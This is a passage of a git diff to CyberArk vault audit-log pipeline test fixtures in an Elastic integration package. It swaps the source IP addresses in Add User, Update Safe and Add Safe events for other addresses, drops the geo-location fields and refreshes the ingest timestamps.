@@ -798,8 +683,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:28.586643200Z", - "original": "\u003c5\u003e1 2021-03-14T12:57:16Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:57:16\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:57:16Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e180\u003c/MessageID\u003e\\n \u003cDesc\u003eAdd User\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eAdd User\u003c/Action\u003e\\n \u003cSourceUser\u003ePSMPGW_SSH\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eAdd User\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 05:57:16\",\"IsoTimestamp\":\"2021-03-14T12:57:16Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"180\",\"Desc\":\"Add User\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add 
User\",\"SourceUser\":\"PSMPGW_SSH\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"34.71.250.247\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add User\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:37.830959500Z", + "original": "\u003c5\u003e1 2021-03-14T12:57:16Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:57:16\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:57:16Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e180\u003c/MessageID\u003e\\n \u003cDesc\u003eAdd User\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eAdd User\u003c/Action\u003e\\n \u003cSourceUser\u003ePSMPGW_SSH\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eAdd User\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 05:57:16\",\"IsoTimestamp\":\"2021-03-14T12:57:16Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"180\",\"Desc\":\"Add 
User\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add User\",\"SourceUser\":\"PSMPGW_SSH\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add User\",\"GatewayStation\":\"\"}}}", "code": "180", "kind": "event", "action": "add user", @@ -825,17 +710,8 @@ } }, "source": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.71.250.247", - "ip": "34.71.250.247" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -855,7 +731,7 @@ "PSMPApp_SSH" ], "ip": [ - "34.71.250.247" + "67.43.156.15" ] }, "cyberarkpas": { 
@@ -863,8 +739,8 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-14T12:57:16Z", - "station": "34.71.250.247", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 05:57:16\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T12:57:16Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e180\u003c/MessageID\u003e\n \u003cDesc\u003eAdd User\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eAdd User\u003c/Action\u003e\n \u003cSourceUser\u003ePSMPApp_SSH\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eAdd User\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "station": "67.43.156.15", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 05:57:16\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T12:57:16Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e180\u003c/MessageID\u003e\n \u003cDesc\u003eAdd User\u003c/Desc\u003e\n 
\u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eAdd User\u003c/Action\u003e\n \u003cSourceUser\u003ePSMPApp_SSH\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eAdd User\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "action": "Add User", "source_user": "PSMPApp_SSH", "message": "Add User", 
@@ -878,8 +754,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:28.586646900Z", - "original": "\u003c5\u003e1 2021-03-14T12:57:16Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:57:16\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:57:16Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e180\u003c/MessageID\u003e\\n \u003cDesc\u003eAdd User\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eAdd User\u003c/Action\u003e\\n \u003cSourceUser\u003ePSMPApp_SSH\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eAdd User\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 05:57:16\",\"IsoTimestamp\":\"2021-03-14T12:57:16Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"180\",\"Desc\":\"Add User\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add 
User\",\"SourceUser\":\"PSMPApp_SSH\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"34.71.250.247\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add User\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:37.830964900Z", + "original": "\u003c5\u003e1 2021-03-14T12:57:16Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:57:16\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:57:16Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e180\u003c/MessageID\u003e\\n \u003cDesc\u003eAdd User\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eAdd User\u003c/Action\u003e\\n \u003cSourceUser\u003ePSMPApp_SSH\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eAdd User\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 05:57:16\",\"IsoTimestamp\":\"2021-03-14T12:57:16Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"180\",\"Desc\":\"Add 
User\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add User\",\"SourceUser\":\"PSMPApp_SSH\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add User\",\"GatewayStation\":\"\"}}}", "code": "180", "kind": "event", "action": "add user", @@ -905,17 +781,8 @@ } }, "source": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.71.250.247", - "ip": "34.71.250.247" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -935,7 +802,7 @@ "PSMP_ADB_asr-cyberark-psm-ssh" ], "ip": [ - "34.71.250.247" + "67.43.156.15" ] }, "cyberarkpas": { 
@@ -943,8 +810,8 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-14T12:57:21Z", - "station": "34.71.250.247", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 05:57:21\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T12:57:21Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e180\u003c/MessageID\u003e\n \u003cDesc\u003eAdd User\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eAdd User\u003c/Action\u003e\n \u003cSourceUser\u003ePSMP_ADB_asr-cyberark-psm-ssh\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eAdd User\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "station": "67.43.156.15", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 05:57:21\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T12:57:21Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e180\u003c/MessageID\u003e\n \u003cDesc\u003eAdd User\u003c/Desc\u003e\n 
\u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eAdd User\u003c/Action\u003e\n \u003cSourceUser\u003ePSMP_ADB_asr-cyberark-psm-ssh\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eAdd User\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "action": "Add User", "source_user": "PSMP_ADB_asr-cyberark-psm-ssh", "message": "Add User", 
@@ -958,8 +825,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:28.586650500Z", - "original": "\u003c5\u003e1 2021-03-14T12:57:21Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:57:21\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:57:21Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e180\u003c/MessageID\u003e\\n \u003cDesc\u003eAdd User\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eAdd User\u003c/Action\u003e\\n \u003cSourceUser\u003ePSMP_ADB_asr-cyberark-psm-ssh\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eAdd User\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 05:57:21\",\"IsoTimestamp\":\"2021-03-14T12:57:21Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"180\",\"Desc\":\"Add User\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add 
User\",\"SourceUser\":\"PSMP_ADB_asr-cyberark-psm-ssh\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"34.71.250.247\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add User\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:37.830970700Z", + "original": "\u003c5\u003e1 2021-03-14T12:57:21Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:57:21\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:57:21Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e180\u003c/MessageID\u003e\\n \u003cDesc\u003eAdd User\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eAdd User\u003c/Action\u003e\\n \u003cSourceUser\u003ePSMP_ADB_asr-cyberark-psm-ssh\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eAdd User\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 
05:57:21\",\"IsoTimestamp\":\"2021-03-14T12:57:21Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"180\",\"Desc\":\"Add User\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add User\",\"SourceUser\":\"PSMP_ADB_asr-cyberark-psm-ssh\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add User\",\"GatewayStation\":\"\"}}}", "code": "180", "kind": "event", "action": "add user", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-181-update-safe.log b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-181-update-safe.log index 93d8a45a00e..9ace149430f 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-181-update-safe.log +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-181-update-safe.log 
@@ -1 +1 @@ -<5>1 2021-03-10T18:15:44Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:15:44","IsoTimestamp":"2021-03-10T18:15:44Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"181","Desc":"Update Safe","Severity":"Info","Issuer":"Administrator","Action":"Update Safe","SourceUser":"","TargetUser":"","Safe":"PSM","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Safe","GatewayStation":""}}} +<5>1 2021-03-10T18:15:44Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:15:44","IsoTimestamp":"2021-03-10T18:15:44Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"181","Desc":"Update Safe","Severity":"Info","Issuer":"Administrator","Action":"Update Safe","SourceUser":"","TargetUser":"","Safe":"PSM","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Safe","GatewayStation":""}}} diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-181-update-safe.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-181-update-safe.log-expected.json index 3279b4d5942..42dd5c423c0 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-181-update-safe.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-181-update-safe.log-expected.json 
@@ -7,20 +7,8 @@
 }
 },
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "address": "81.32.170.205",
- "ip": "81.32.170.205"
+ "address": "67.43.156.13",
+ "ip": "67.43.156.13"
 },
 "tags": [
 "preserve_original_event"
@@ -37,7 +25,7 @@
 },
 "related": {
 "ip": [
- "81.32.170.205"
+ "67.43.156.13"
 ]
 },
 "cyberarkpas": {
@@ -46,7 +34,7 @@
 "rfc5424": true,
 "iso_timestamp": "2021-03-10T18:15:44Z",
 "safe": "PSM",
- "station": "81.32.170.205",
+ "station": "67.43.156.13",
 "action": "Update Safe",
 "message": "Update Safe",
 "issuer": "Administrator",
@@ -60,8 +48,8 @@ "event": { "severity": 2, "action": "update safe", - "ingested": "2021-06-09T10:24:28.899514900Z", - "original": "\u003c5\u003e1 2021-03-10T18:15:44Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:15:44\",\"IsoTimestamp\":\"2021-03-10T18:15:44Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"181\",\"Desc\":\"Update Safe\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Update Safe\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Update Safe\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:39.071393700Z", + "original": "\u003c5\u003e1 2021-03-10T18:15:44Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:15:44\",\"IsoTimestamp\":\"2021-03-10T18:15:44Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"181\",\"Desc\":\"Update Safe\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Update Safe\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Update Safe\",\"GatewayStation\":\"\"}}}", "code": "181", "kind": "event" } diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-185-add-safe.log b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-185-add-safe.log index 21a17a2c729..bfe809491fe 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-185-add-safe.log +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-185-add-safe.log 
@@ -1,2 +1,2 @@
-<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"185","Desc":"Add Safe","Severity":"Info","Issuer":"Administrator","Action":"Add Safe","SourceUser":"","TargetUser":"","Safe":"PSMPConf","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Safe","GatewayStation":""}}}
